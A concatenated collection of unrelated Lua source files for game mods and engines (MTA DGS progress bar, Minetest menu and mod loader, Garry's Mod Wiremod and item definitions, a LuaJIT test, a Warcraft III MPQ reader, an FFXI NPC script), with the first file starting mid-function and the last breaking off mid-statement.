local eleData = dgsElementData[source]
local iPosX,iPosY,iSizX,iSizY = x+padding[1],y+padding[2],w-padding[1]*2,h-padding[2]*2
local iSizYPercent = iSizY*percent
local iSizYPercentRev = iSizY*(1-percent)
if bgImage then
dxDrawImage(x,y,w,h,bgImage,0,0,0,bgColor,rendSet,rndtgt)
else
dxDrawRectangle(x,y,w,h,bgColor,rendSet)
end
if type(indicatorImage) == "table" then
if type(indicatorColor) ~= "table" then
indicatorColor = {indicatorColor,indicatorColor}
end
if indicatorMode then
local sx,sy = eleData.indicatorUVSize[1],eleData.indicatorUVSize[2]
if not sx or not sy then
sx1,sy1 = dxGetMaterialSize(indicatorImage[1])
sx2,sy2 = dxGetMaterialSize(indicatorImage[2])
else
sx1,sy1,sx2,sy2 = sx,sy,sx,sy
end
dxDrawImageSection(iPosX,iPosY+iSizYPercentRev,iSizX,iSizYPercent,0,sy1*(1-percent),sx1,sy1*percent,indicatorImage[1],0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImageSection(iPosX,iPosY,iSizX,iSizY-iSizYPercent,0,sy2,sx2,sy2*(1-percent),indicatorImage[1],0,0,0,indicatorColor[2],rendSet,rndtgt)
else
dxDrawImage(iPosX,iPosY,iSizX,iSizYPercent,indicatorImage[1],0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImage(iPosX,iSizYPercent+iPosY,iSizX,iSizY-iSizYPercent,iSizY,indicatorImage[2],0,0,0,indicatorColor[2],rendSet,rndtgt)
end
elseif isElement(indicatorImage) then
if type(indicatorColor) == "table" then
if indicatorMode then
local sx,sy = eleData.indicatorUVSize[1],eleData.indicatorUVSize[2]
if not sx or not sy then sx,sy = dxGetMaterialSize(indicatorImage) end
dxDrawImageSection(iPosX,iPosY+iSizYPercentRev,iSizX,iSizYPercent,0,sy*(1-percent),sx,sy*percent,indicatorImage,0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImageSection(iPosX,iPosY,iSizX,iSizY-iSizYPercent,0,sy,sx,sy*(1-percent),indicatorImage,0,0,0,indicatorColor[2],rendSet,rndtgt)
else
dxDrawImage(iPosX,iPosY+iSizYPercentRev,iSizX,iSizYPercent,indicatorImage,0,0,0,indicatorColor[1],rendSet,rndtgt)
dxDrawImage(iPosX,iPosY,iSizX,iSizY-iSizYPercent,indicatorImage,0,0,0,indicatorColor[2],rendSet,rndtgt)
end
else
if indicatorMode then
local sx,sy = eleData.indicatorUVSize[1],eleData.indicatorUVSize[2]
if not sx or not sy then sx,sy = dxGetMaterialSize(indicatorImage) end
dxDrawImageSection(iPosX,iPosY,iSizX,iSizYPercent,0,0,sx,sy*percent,indicatorImage,0,0,0,indicatorColor,rendSet,rndtgt)
else
dxDrawImage(iPosX,iPosY,iSizX,iSizYPercent,indicatorImage,0,0,0,indicatorColor,rendSet,rndtgt)
end
end
elseif type(indicatorColor) == "table" then
dxDrawRectangle(iPosX,iPosY+iSizYPercentRev,iSizX,iSizYPercent,indicatorColor[1],rendSet)
dxDrawRectangle(iPosX,iPosY,iSizX,iSizY-iSizYPercent,indicatorColor[2],rendSet)
else
dxDrawRectangle(iPosX,iPosY+iSizYPercentRev,iSizX,iSizYPercent,indicatorColor,rendSet)
end
end,
["ring-round"] = function(source,x,y,w,h,bgImage,bgColor,indicatorImage,indicatorColor,indicatorMode,padding,percent)
local eleData = dgsElementData[source]
local styleData = eleData.styleData
local circle = styleData.elements.circleShader
local startPoint,endPoint = 0,percent
dxSetShaderValue(circle,"progress",{styleData.isReverse and endPoint or startPoint,not styleData.isReverse and endPoint or startPoint})
if startPoint == endPoint then
dxSetShaderValue(circle,"indicatorColor",{0,0,0,0})
else
dxSetShaderValue(circle,"indicatorColor",{fromcolor(indicatorColor,true,true)})
end
dxSetShaderValue(circle,"thickness",styleData.thickness)
dxSetShaderValue(circle,"radius",styleData.radius)
dxSetShaderValue(circle,"antiAliased",styleData.antiAliased)
dxDrawImage(x,y,w,h,circle,styleData.rotation,0,0,bgColor,rendSet,rndtgt)
end,
}
function dgsCreateProgressBar(x,y,sx,sy,relative,parent,bgImage,bgColor,indicatorImage,indicatorColor,indicatorMode)
local xCheck,yCheck,wCheck,hCheck = type (x) == "number",type(y) == "number",type(sx) == "number",type(sy) == "number"
if not xCheck then assert(false,"Bad argument @dgsCreateProgressBar at argument 1, expect number got "..type(x)) end
if not yCheck then assert(false,"Bad argument @dgsCreateProgressBar at argument 2, expect number got "..type(y)) end
if not wCheck then assert(false,"Bad argument @dgsCreateProgressBar at argument 3, expect number got "..type(sx)) end
if not hCheck then assert(false,"Bad argument @dgsCreateProgressBar at argument 4, expect number got "..type(sy)) end
if isElement(bgImage) then
local imgtyp = getElementType(bgImage)
local imgCheck = imgtyp == "texture" or imgtyp == "shader"
if not imgCheck then assert(false,"Bad argument @dgsCreateProgressBar at argument 7, expect texture got "..imgtyp) end
end
if isElement(indicatorImage) then
local imgtyp = getElementType(indicatorImage)
local imgCheck = imgtyp == "texture" or imgtyp == "shader"
if not imgCheck then assert(false,"Bad argument @dgsCreateProgressBar at argument 9, expect texture got "..imgtyp) end
end
local progressbar = createElement("dgs-dxprogressbar")
dgsSetType(progressbar,"dgs-dxprogressbar")
dgsSetParent(progressbar,parent,true,true)
local style = styleSettings.progressbar
dgsElementData[progressbar] = {
renderBuffer = {},
bgColor = bgColor or style.bgColor,
bgImage = bgImage or dgsCreateTextureFromStyle(style.bgImage),
indicatorColor = indicatorColor or style.indicatorColor,
indicatorImage = indicatorImage or dgsCreateTextureFromStyle(style.indicatorImage),
indicatorMode = indicatorMode and true or false,
padding = style.padding,
styleData = {},
style = "normal-horizontal",
progress = 0,
map = {0,100},
}
calculateGuiPositionSize(progressbar,x,y,relative or false,sx,sy,relative or false,true)
local mx,my = false,false
if isElement(indicatorImage) then
mx,my = dxGetMaterialSize(indicatorImage)
end
dgsElementData[progressbar].indicatorUVSize = {mx,my}
triggerEvent("onDgsCreate",progressbar,sourceResource)
return progressbar
end
function dgsProgressBarSetStyle(progressbar,style,settingTable)
if type(progressbar) == "table" then
for i=1,#progressbar do
dgsProgressBarSetStyle(progressbar[i],style,settingTable)
end
return true
end
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarSetStyle at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
if ProgressBarStyle[style] then
dgsSetData(progressbar,"style",style)
for k,v in pairs(dgsElementData[progressbar].styleData.elements or {}) do
destroyElement(v)
end
if style == "normal-horizontal" or style == "normal-vertical" then
dgsSetData(progressbar,"styleData",{})
elseif style == "ring-round" then
dgsSetData(progressbar,"styleData",{})
local styleData = dgsElementData[progressbar].styleData
styleData.elements = {}
styleData.elements.circleShader = dxCreateShader(ProgressBarShaders["ring-round"])
styleData.isReverse = false
styleData.rotation = 0
styleData.antiAliased = 0.005
styleData.radius = 0.2
styleData.thickness = 0.02
end
for k,v in pairs(settingTable or {}) do
dgsElementData[progressbar].styleData[k] = v
end
return true
end
return false
end
function dgsProgressBarGetStyle(progressbar)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarGetStyle at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
return dgsElementData[progressbar].style
end
function dgsProgressBarGetStyleProperty(progressbar,propertyName)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarGetStyleProperty at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
return dgsElementData[progressbar].styleData[propertyName]
end
function dgsProgressBarGetStyleProperties(progressbar)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarGetStyleProperties at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
return dgsElementData[progressbar].styleData
end
function dgsProgressBarSetStyleProperty(progressbar,propertyName,value)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarSetStyleProperty at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
dgsElementData[progressbar].styleData[propertyName] = value
return true
end
function dgsProgressBarGetProgress(progressbar,isAbsolute)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarGetProgress at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
local progress = dgsElementData[progressbar].progress
local scaler = dgsElementData[progressbar].map
if not isAbsolute then
progress = progress/100*(scaler[2]-scaler[1])+scaler[1]
end
return progress
end
function dgsProgressBarSetProgress(progressbar,progress,isAbsolute)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarSetProgress at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
local scaler = dgsElementData[progressbar].map
if progress < 0 then progress = 0 end
if progress > 100 then progress = 100 end
if not isAbsolute then
progress = (progress-scaler[1])/(scaler[2]-scaler[1])*100
end
if progress < 0 then progress = 0 end
if progress > 100 then progress = 100 end
if dgsElementData[progressbar].progress ~= progress then
dgsSetData(progressbar,"progress",progress)
end
return true
end
function dgsProgressBarSetMode(progressbar,mode)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarSetindicatorMode at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
return dgsSetData(progressbar,"indicatorMode",mode and true or false)
end
function dgsProgressBarGetMode(progressbar)
assert(dgsGetType(progressbar) == "dgs-dxprogressbar","Bad argument @dgsProgressBarSetindicatorMode at argument 1, expect dgs-dxprogressbar got "..dgsGetType(progressbar))
return dgsElementData[progressbar].indicatorMode
end
----------------Shader
ProgressBarShaders["ring-round"] = [[float borderSoft = 0.02;
float radius = 0.2;
float thickness = 0.02;
float2 progress = float2(0,0.1);
float4 indicatorColor = float4(0,1,1,1);
float PI2 = 6.283185;
float4 blend(float4 c1, float4 c2){
float alp = c1.a+c2.a-c1.a*c2.a;
float3 color = (c1.rgb*c1.a*(1.0-c2.a)+c2.rgb*c2.a)/alp;
return float4(color,alp);
}
float4 myShader(float2 tex:TEXCOORD0,float4 color:COLOR0):COLOR0{
float2 dxy = float2(length(ddx(tex)),length(ddy(tex)));
float nBS = borderSoft*sqrt(dxy.x*dxy.y)*100;
float4 bgColor = color;
float4 inColor = 0;
float2 texFixed = tex-0.5;
float delta = clamp(1-(abs(length(texFixed)-radius)-thickness+nBS)/nBS,0,1);
bgColor.a *= delta;
float2 progFixed = progress*PI2;
float angle = atan2(tex.y-0.5,0.5-tex.x)+0.5*PI2;
bool tmp1 = angle>progFixed.x;
bool tmp2 = angle<progFixed.y;
float dis_ = distance(float2(cos(progFixed.x),-sin(progFixed.x))*radius,texFixed);
float4 Color1,Color2;
if(dis_<=thickness){
float tmpDelta = clamp(1-(dis_-thickness+nBS)/nBS,0,1);
Color1 = indicatorColor;
inColor = indicatorColor;
Color1.a *= tmpDelta;
}
dis_ = distance(float2(cos(progFixed.y),-sin(progFixed.y))*radius,texFixed);
if(dis_<=thickness){
float tmpDelta = clamp(1-(dis_-thickness+nBS)/nBS,0,1);
Color2 = indicatorColor;
inColor = indicatorColor;
Color2.a *= tmpDelta;
}
inColor.a = max(Color1.a,Color2.a);
if(progress.x>=progress.y){
if(tmp1+tmp2){
inColor = indicatorColor;
inColor.a *= delta;
}
}else{
if(tmp1*tmp2){
inColor = indicatorColor;
inColor.a *= delta;
}
}
return blend(bgColor,inColor);
}
technique DrawCircle{
pass P0 {
PixelShader = compile ps_2_a myShader();
}
}
]]
----------------------------------------------------------------
--------------------------Renderer------------------------------
----------------------------------------------------------------
dgsRenderer["dgs-dxprogressbar"] = function(source,x,y,w,h,mx,my,cx,cy,enabled,eleData,parentAlpha,isPostGUI,rndtgt)
local bgImage = eleData.bgImage
local bgColor = applyColorAlpha(eleData.bgColor,parentAlpha)
local indicatorImage,indicatorColor = eleData.indicatorImage,eleData.indicatorColor
if type(indicatorColor) == "table" then
indicatorColor = {applyColorAlpha(indicatorColor[1],parentAlpha),applyColorAlpha(indicatorColor[2],parentAlpha)}
else
indicatorColor = applyColorAlpha(indicatorColor,parentAlpha)
end
local indicatorMode = eleData.indicatorMode
local padding = eleData.padding
local percent = eleData.progress*0.01
ProgressBarStyle[eleData.style](source,x,y,w,h,bgImage,bgColor,indicatorImage,indicatorColor,indicatorMode,padding,percent,isPostGUI)
return rndtgt
end |
--Minetest
--Copyright (C) 2013 sapier
--
--This program is free software; you can redistribute it and/or modify
--it under the terms of the GNU Lesser General Public License as published by
--the Free Software Foundation; either version 2.1 of the License, or
--(at your option) any later version.
--
--This program is distributed in the hope that it will be useful,
--but WITHOUT ANY WARRANTY; without even the implied warranty of
--MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
--GNU Lesser General Public License for more details.
--
--You should have received a copy of the GNU Lesser General Public License along
--with this program; if not, write to the Free Software Foundation, Inc.,
--51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
--------------------------------------------------------------------------------
local function get_formspec(tabview, name, tabdata)
local retval = ""
local render_details = dump(core.setting_getbool("public_serverlist"))
retval = retval ..
"label[8,0.5;".. fgettext("Name/Password") .. "]" ..
"field[0.25,3.25;5.5,0.5;te_address;;" ..
core.formspec_escape(core.setting_get("address")) .."]" ..
"field[5.75,3.25;2.25,0.5;te_port;;" ..
core.formspec_escape(core.setting_get("remote_port")) .."]" ..
"checkbox[8,-0.25;cb_public_serverlist;".. fgettext("Public Serverlist") .. ";" ..
render_details .. "]"
retval = retval ..
"button[8,2.5;4,1.5;btn_mp_connect;".. fgettext("Connect") .. "]" ..
"field[8.75,1.5;3.5,0.5;te_name;;" ..
core.formspec_escape(core.setting_get("name")) .."]" ..
"pwdfield[8.75,2.3;3.5,0.5;te_pwd;]"
if render_details then
retval = retval .. "tablecolumns[" ..
"color,span=3;" ..
"text,align=right;" .. -- clients
"text,align=center,padding=0.25;" .. -- "/"
"text,align=right,padding=0.25;" .. -- clients_max
image_column(fgettext("Creative mode"), "creative") .. ",padding=1;" ..
image_column(fgettext("Damage enabled"), "damage") .. ",padding=0.25;" ..
image_column(fgettext("PvP enabled"), "pvp") .. ",padding=0.25;" ..
"color,span=1;" ..
"text,padding=1]" -- name
else
retval = retval .. "tablecolumns[text]"
end
retval = retval ..
"table[-0.05,0;7.55,2.75;favourites;"
if #menudata.favorites > 0 then
retval = retval .. render_favorite(menudata.favorites[1],render_details)
for i=2,#menudata.favorites,1 do
retval = retval .. "," .. render_favorite(menudata.favorites[i],render_details)
end
end
if tabdata.fav_selected ~= nil then
retval = retval .. ";" .. tabdata.fav_selected .. "]"
else
retval = retval .. ";0]"
end
-- separator
retval = retval ..
"box[-0.28,3.75;12.4,0.1;#FFFFFF]"
-- checkboxes
retval = retval ..
"checkbox[8.0,3.9;cb_creative;".. fgettext("Creative Mode") .. ";" ..
dump(core.setting_getbool("creative_mode")) .. "]"..
"checkbox[8.0,4.4;cb_damage;".. fgettext("Enable Damage") .. ";" ..
dump(core.setting_getbool("enable_damage")) .. "]"
-- buttons
retval = retval ..
"button[0,3.7;8,1.5;btn_start_singleplayer;" .. fgettext("Start Singleplayer") .. "]" ..
"button[0,4.5;8,1.5;btn_config_sp_world;" .. fgettext("Config mods") .. "]"
return retval
end
--------------------------------------------------------------------------------
local function main_button_handler(tabview, fields, name, tabdata)
if fields["btn_start_singleplayer"] then
gamedata.selected_world = gamedata.worldindex
gamedata.singleplayer = true
core.start()
return true
end
if fields["favourites"] ~= nil then
local event = core.explode_table_event(fields["favourites"])
if event.type == "CHG" then
if event.row <= #menudata.favorites then
local address = menudata.favorites[event.row].address
local port = menudata.favorites[event.row].port
if address ~= nil and
port ~= nil then
core.setting_set("address",address)
core.setting_set("remote_port",port)
end
tabdata.fav_selected = event.row
end
end
return true
end
if fields["cb_public_serverlist"] ~= nil then
core.setting_set("public_serverlist", fields["cb_public_serverlist"])
if core.setting_getbool("public_serverlist") then
asyncOnlineFavourites()
else
menudata.favorites = core.get_favorites("local")
end
return true
end
if fields["cb_creative"] then
core.setting_set("creative_mode", fields["cb_creative"])
return true
end
if fields["cb_damage"] then
core.setting_set("enable_damage", fields["cb_damage"])
return true
end
if fields["btn_mp_connect"] ~= nil or
fields["key_enter"] ~= nil then
gamedata.playername = fields["te_name"]
gamedata.password = fields["te_pwd"]
gamedata.address = fields["te_address"]
gamedata.port = fields["te_port"]
local fav_idx = core.get_textlist_index("favourites")
if fav_idx ~= nil and fav_idx <= #menudata.favorites and
menudata.favorites[fav_idx].address == fields["te_address"] and
menudata.favorites[fav_idx].port == fields["te_port"] then
gamedata.servername = menudata.favorites[fav_idx].name
gamedata.serverdescription = menudata.favorites[fav_idx].description
if not is_server_protocol_compat_or_error(menudata.favorites[fav_idx].proto_min,
menudata.favorites[fav_idx].proto_max) then
return true
end
else
gamedata.servername = ""
gamedata.serverdescription = ""
end
gamedata.selected_world = 0
core.setting_set("address",fields["te_address"])
core.setting_set("remote_port",fields["te_port"])
core.start()
return true
end
if fields["btn_config_sp_world"] ~= nil then
local configdialog = create_configure_world_dlg(1)
if (configdialog ~= nil) then
configdialog:set_parent(tabview)
tabview:hide()
configdialog:show()
end
return true
end
end
--------------------------------------------------------------------------------
local function on_activate(type,old_tab,new_tab)
if type == "LEAVE" then
return
end
if core.setting_getbool("public_serverlist") then
asyncOnlineFavourites()
else
menudata.favorites = core.get_favorites("local")
end
end
--------------------------------------------------------------------------------
tab_simple_main = {
name = "main",
caption = fgettext("Main"),
cbf_formspec = get_formspec,
cbf_button_handler = main_button_handler,
on_change = on_activate
}
|
WireLib.RTFix = {}
local RTFix = WireLib.RTFix
---------------------------------------------------------------------
-- RTFix Lib
---------------------------------------------------------------------
RTFix.List = {}
function RTFix:Add(ClassName, NiceName, Function)
RTFix.List[ClassName] = {NiceName, Function}
end
function RTFix:GetAll()
return RTFix.List
end
function RTFix:Get(ClassName)
return RTFix.List[ClassName]
end
function RTFix:ReloadAll()
for k, v in pairs(RTFix.List) do
local func = v[2]
for k2, v2 in ipairs(ents.FindByClass(k)) do
func(v2)
end
end
end
function RTFix:Reload(ClassName)
local func = RTFix.List[ClassName][2]
for k, v in ipairs(ents.FindByClass(ClassName)) do
func(v)
end
end
---------------------------------------------------------------------
-- Console Command
---------------------------------------------------------------------
concommand.Add("wire_rt_fix", function()
RTFix:ReloadAll()
end)
---------------------------------------------------------------------
-- Tool Menu
---------------------------------------------------------------------
local function CreateCPanel(Panel)
Panel:ClearControls()
Panel:Help([[Here you can fix screens that use
rendertargets if they break due to lag.
If a screen is not on this list, it means
that either its author has not added it to
this list, the screen has its own fix, or
that no fix is necessary.
You can also use the console command
"wire_rt_fix", which does the same thing
as pressing the "All" button.]])
local btn = vgui.Create("DButton")
btn:SetText("All")
function btn:DoClick()
RTFix:ReloadAll()
end
btn:SetToolTip("Fix all RTs on the map.")
Panel:AddItem(btn)
for k, v in pairs(RTFix.List) do
local btn = vgui.Create("DButton")
btn:SetText(v[1])
btn:SetToolTip("Fix all " .. v[1] .. "s on the map\n(" .. k .. ")")
function btn:DoClick()
RTFix:Reload(k)
end
Panel:AddItem(btn)
end
end
hook.Add("PopulateToolMenu", "WireLib_RenderTarget_Fix", function()
spawnmenu.AddToolMenuOption("Wire", "Options", "RTFix", "Fix RenderTargets", "", "", CreateCPanel, nil)
end)
---------------------------------------------------------------------
-- Add all default wire components
-- credits to sk89q for making this: http://www.wiremod.com/forum/bug-reports/19921-cs-egp-gpu-etc-issue-when-rejoin-lag-out.html#post193242
---------------------------------------------------------------------
-- Helper function
local function def(ent, redrawkey)
if (ent.GPU or ent.GPU.RT) then
ent.GPU:FreeRT()
end
ent.GPU:Initialize()
if (redrawkey) then
ent[redrawkey] = true
end
end
RTFix:Add("gmod_wire_consolescreen", "Console Screen", function(ent)
def(ent, "NeedRefresh")
end)
RTFix:Add("gmod_wire_digitalscreen", "Digital Screen", function(ent)
def(ent, "NeedRefresh")
end)
RTFix:Add("gmod_wire_gpu", "GPU", def)
--RTFix:Add("gmod_wire_graphics_tablet","Graphics Tablet", function( ent ) def( ent, nil, true ) end) No fix is needed for this
RTFix:Add("gmod_wire_oscilloscope", "Oscilloscope", def)
--RTFix:Add("gmod_wire_panel","Control Panel", function( ent ) def( ent, nil, true ) end) No fix is needed for this
--RTFix:Add("gmod_wire_screen","Screen", function( ent ) def( ent, nil, true ) end) No fix is needed for this
RTFix:Add("gmod_wire_textscreen", "Text Screen", function(ent)
def(ent, "NeedRefresh")
end)
RTFix:Add("gmod_wire_egp", "EGP", function(ent)
def(ent, "NeedsUpdate")
end)
-- EGP Emitter needs a check because it can optionally not use RTs
RTFix:Add("gmod_wire_egp_emitter", "EGP Emitter", function(ent)
if ent:GetUseRT() then
def(ent, "NeedsUpdate")
end
end) |
_class("AbstractEntityIndex")
---@param name 索引名称
---@param group 索引监听的组
---@param getkey 获取entity的key或keys
---@param ismultikey 指定true则getkey返回多个key
---
function AbstractEntityIndex:Constructor(name, group, getkey, ismultikey)
self.name = name
self.group = group
self.getkey = getkey
self.ismultikey = ismultikey
end
function AbstractEntityIndex:Destructor()
self:deactivate()
end
function AbstractEntityIndex:activate()
self.group.Ev_OnEntityAdded:AddEvent(self,self.onEntityAdded)
self.group.Ev_OnEntityRemoved:AddEvent(self,self.onEntityRemoved)
end
function AbstractEntityIndex:deactivate()
self.group.Ev_OnEntityAdded:RemoveEvent(self,self.onEntityAdded)
self.group.Ev_OnEntityRemoved:RemoveEvent(self,self.onEntityRemoved)
self:clear()
end
function AbstractEntityIndex:indexEntities(group)
for e, _ in pairs(group._entities) do
if not self.ismultikey then
self:addEntity(self.getkey(e), e)
else
local keys = self.getkey(e)
for _, k in pairs(keys) do
self:addEntity(k, e)
end
end
end
end
function AbstractEntityIndex:onEntityAdded(group, entity, index, component)
if not self.ismultikey then
self:addEntity(self.getkey(entity, component), entity)
else
local keys = self.getkey(entity, component)
for _, k in pairs(keys) do
self:addEntity(k, entity)
end
end
end
function AbstractEntityIndex:onEntityRemoved(group, entity, index, component)
if not self.ismultikey then
self:removeEntity(self.getkey(entity, component), entity)
else
local keys = self.getkey(entity, component)
for _, k in pairs(keys) do
self:removeEntity(k, entity)
end
end
end
function AbstractEntityIndex:addEntity(key, entity)
error("AbstractEntityIndex:addEntity not implemented")
end
function AbstractEntityIndex:removeEntity(key, entity)
error("AbstractEntityIndex:removeEntity not implemented")
end
function AbstractEntityIndex:clear()
error("AbstractEntityIndex:clear not implemented")
end
_class("EntityIndex", AbstractEntityIndex)
function EntityIndex:Constructor(name, group, getkey)
self.indexes = {}
self:Activate()
end
function EntityIndex:Activate()
self:activate()
self:indexEntities(self.group)
end
function EntityIndex:GetEntities(key)
local entities = self.indexes[key]
if not entities then
entities = {}
self.indexes[key] = entities
end
return entities
end
function EntityIndex:addEntity(key, entity)
local entities = self:GetEntities(key)
entities[entity] = true
entity:Retain(self)
end
function EntityIndex:removeEntity(key, entity)
local entities = self:GetEntities(key)
entities[entity] = nil
entity:Release(self)
end
function EntityIndex:clear()
for _, v in pairs(self.indexes) do
for e, _ in pairs(v) do
e:Release(self)
end
end
self.indexes = nil
end
_class("PrimaryEntityIndex", AbstractEntityIndex)
function PrimaryEntityIndex:Constructor()
self.index = {}
self:Activate()
end
function PrimaryEntityIndex:Activate()
self:activate()
self:indexEntities(self.group)
end
function PrimaryEntityIndex:GetEntity(key)
return self.index[key]
end
function PrimaryEntityIndex:clear()
for e, _ in pairs(self.index) do
e:Release(self)
end
end
function PrimaryEntityIndex:addEntity(key, entity)
if self.index[key] then
error("entity for key" .. key .. "already exists!")
return
end
self.index[key] = entity
entity:Retain(self)
end
function PrimaryEntityIndex:removeEntity(key, entity)
self.index[key] = nil
entity:Release(self)
end
|
ITEM.name = "MP9a1"
ITEM.description= "A compact machine pistol. Fires 9x19mm."
ITEM.longdesc = "The Machine Pistol 9 is a Swiss-made submachinegun from the early 2000s, it weighs 1.4 kilograms unloaded and is generally compact.\nIt features a drop, trigger and ambidextrious safety switch and has a fire-rate of 900 rounds a minute.\n\nAmmo: 9x19mm\nMagazine Capacity: 3"
ITEM.model = ("models/weapons/w_smg_mp9a1.mdl")
ITEM.class = "cw_mp9a1"
ITEM.weaponCategory = "primary"
ITEM.price = 11100
ITEM.width = 2
ITEM.height = 2
ITEM.validAttachments = {"md_microt1","md_eotech","md_aimpoint","md_cmore","md_reflex","md_tundra9mm"}
ITEM.bulletweight = 0.008
ITEM.unloadedweight = 1.4
ITEM.repair_PartsComplexity = 2
ITEM.repair_PartsRarity = 2
function ITEM:GetWeight()
return self.unloadedweight + (self.bulletweight * self:GetData("ammo", 0))
end
ITEM.iconCam = {
pos = Vector(-4, -205, -4),
ang = Angle(0, 90, 0),
fov = 4.6,
}
ITEM.pacData = {
[1] = {
["children"] = {
[1] = {
["children"] = {
[1] = {
["children"] = {
},
["self"] = {
["Angles"] = Angle(0, 180, 0),
["Position"] = Vector(-11.714, -2.715, 4.444),
["Model"] = "models/weapons/w_smg_mp9a1.mdl",
["ClassName"] = "model",
["EditorExpand"] = true,
["UniqueID"] = "79898994673",
["Bone"] = "spine 2",
["Name"] = "mp9a1",
},
},
},
["self"] = {
["AffectChildrenOnly"] = true,
["ClassName"] = "event",
["UniqueID"] = "1238978922",
["Event"] = "weapon_class",
["EditorExpand"] = true,
["Name"] = "weapon class find simple\"@@1\"",
["Arguments"] = "cw_mp9a1@@0",
},
},
},
["self"] = {
["ClassName"] = "group",
["UniqueID"] = "2786496348",
["EditorExpand"] = true,
},
},
} |
-- Tests on BUFPUT constant folding.
-- Copyright (C) 2015-2019 IPONWEB Ltd. See Copyright Notice in COPYRIGHT
jit.opt.start('fold', 'jitstr')
local s
for i = 1, 100 do
local n = 42.42
s = string.format("%d-%s-%s-%d-%s", i, "foo", "bar", 2 * n, "")
end
assert(s == "100-foo-bar-84-")
|
-- create some basic global vars
portal_network = {}
portal_pages = {}
portal_mgc = {}
portal_mgc.modname = minetest.get_current_modname()
portal_mgc.modpath = minetest.get_modpath(portal_mgc.modname)
-- check technic mod is enabled
if (minetest.get_modpath("technic")) ~= nil then portal_mgc.is_technic = true else portal_mgc.is_technic = false end
-- load default and adjustable settings
dofile(portal_mgc.modpath .. "/default_settings.txt")
-- load portal files
dofile(portal_mgc.modpath .. "/portal_gui.lua")
dofile(portal_mgc.modpath .. "/portal.lua")
-- load craft recipes
-- dofile(portal_mgc.modpath .. "/crafts.lua")
print("[Mod] Portal MGC ["..portal_mgc.modname.."] loaded...")
|
--[[
© 2020 TERRANOVA do not share, re-distribute or modify
without permission of the author.
--]]
ITEM.name = "Flat Cap";
ITEM.model = "models/fty/items/flatcap.mdl"
ITEM.description = "An old pre-Union 'cabbie hat', named as such from British taxi drivers, who commonly wore the hats. Not CWU approved.";
ITEM.price = 12
ITEM.flag = "a"
ITEM.bodyGroups = {
["headgear"] = 6,
}
ITEM.iconCam = {
pos = Vector(184.8751373291, 155.23469543457, 111.63706970215),
ang = Angle(25, 220, 0),
fov = 2.5811764705882,
} |
local file_version = require 'ffi.file_version'
local stormlib = require 'ffi.stormlib'
local language_map = {
[0x00000409] = 'enUS',
[0x00000809] = 'enGB',
[0x0000040c] = 'frFR',
[0x00000407] = 'deDE',
[0x0000040a] = 'esES',
[0x00000410] = 'itIT',
[0x00000405] = 'csCZ',
[0x00000419] = 'ruRU',
[0x00000415] = 'plPL',
[0x00000416] = 'ptBR',
[0x00000816] = 'ptPT',
[0x0000041f] = 'tkTK',
[0x00000411] = 'jaJA',
[0x00000412] = 'koKR',
[0x00000404] = 'zhTW',
[0x00000804] = 'zhCN',
[0x0000041e] = 'thTH',
}
local function mpq_language(config)
if not config then
return nil
end
local id = config:match 'LANGID=(0x[%x]+)'
if not id then
return nil
end
return language_map[tonumber(id)]
end
local function war3_ver (input)
if not input then
return nil
end
if not fs.is_directory(input) then
return nil
end
local exe_path = input / 'War3.exe'
if fs.exists(exe_path) then
local ver = file_version(exe_path:string())
if ver.major > 1 or ver.minor >= 29 then
return ('%d.%d.%d'):format(ver.major, ver.minor, ver.revision)
end
end
local exe_path = input / 'Warcraft III.exe'
if fs.exists(exe_path) then
local ver = file_version(exe_path:string())
if ver.major > 1 or ver.minor >= 29 then
return ('%d.%d.%d'):format(ver.major, ver.minor, ver.revision)
end
end
local dll_path = input / 'Game.dll'
if fs.exists(dll_path) then
local ver = file_version(dll_path:string())
return ('%d.%d.%d'):format(ver.major, ver.minor, ver.revision)
end
return nil
end
local m = {}
function m:open(path)
local war3_ver = war3_ver(path)
if not war3_ver then
return false
end
self.mpqs = {}
for _, mpqname in ipairs {
'War3Patch.mpq',
'War3xLocal.mpq',
'War3x.mpq',
'War3Local.mpq',
'War3.mpq',
} do
self.mpqs[#self.mpqs+1] = stormlib.open(path / mpqname, true)
end
local lg = mpq_language(self:readfile('config.txt'))
if lg then
self.name = lg .. '-' .. war3_ver
end
return true
end
function m:close()
for _, mpq in ipairs(self.mpqs) do
mpq:close()
end
self.mpqs = {}
end
function m:readfile(filename)
for _, mpq in ipairs(self.mpqs) do
if mpq:has_file(filename) then
return mpq:load_file(filename)
end
end
end
function m:extractfile(filename, targetpath)
for _, mpq in ipairs(self.mpqs) do
if mpq:has_file(filename) then
return mpq:extract(filename, targetpath)
end
end
end
return m
|
-----------------------------------
-- Area: Crawlers' Nest
-- NPC: ??? - Guardian Crawler (Spawn area 1)
-- !pos 124.335 -34.609 -75.373 197
-----------------------------------
local ID = require("scripts/zones/Crawlers_Nest/IDs")
require("scripts/globals/npc_util")
-----------------------------------
function onTrade(player,npc,trade)
if npcUtil.tradeHas(trade, 4365) then -- Rolanberry
player:confirmTrade()
if math.random(1,100) > 38 or not npcUtil.popFromQM(player, npc, ID.mob.AWD_GOGGIE - 6, {claim=true, hide=0}) then
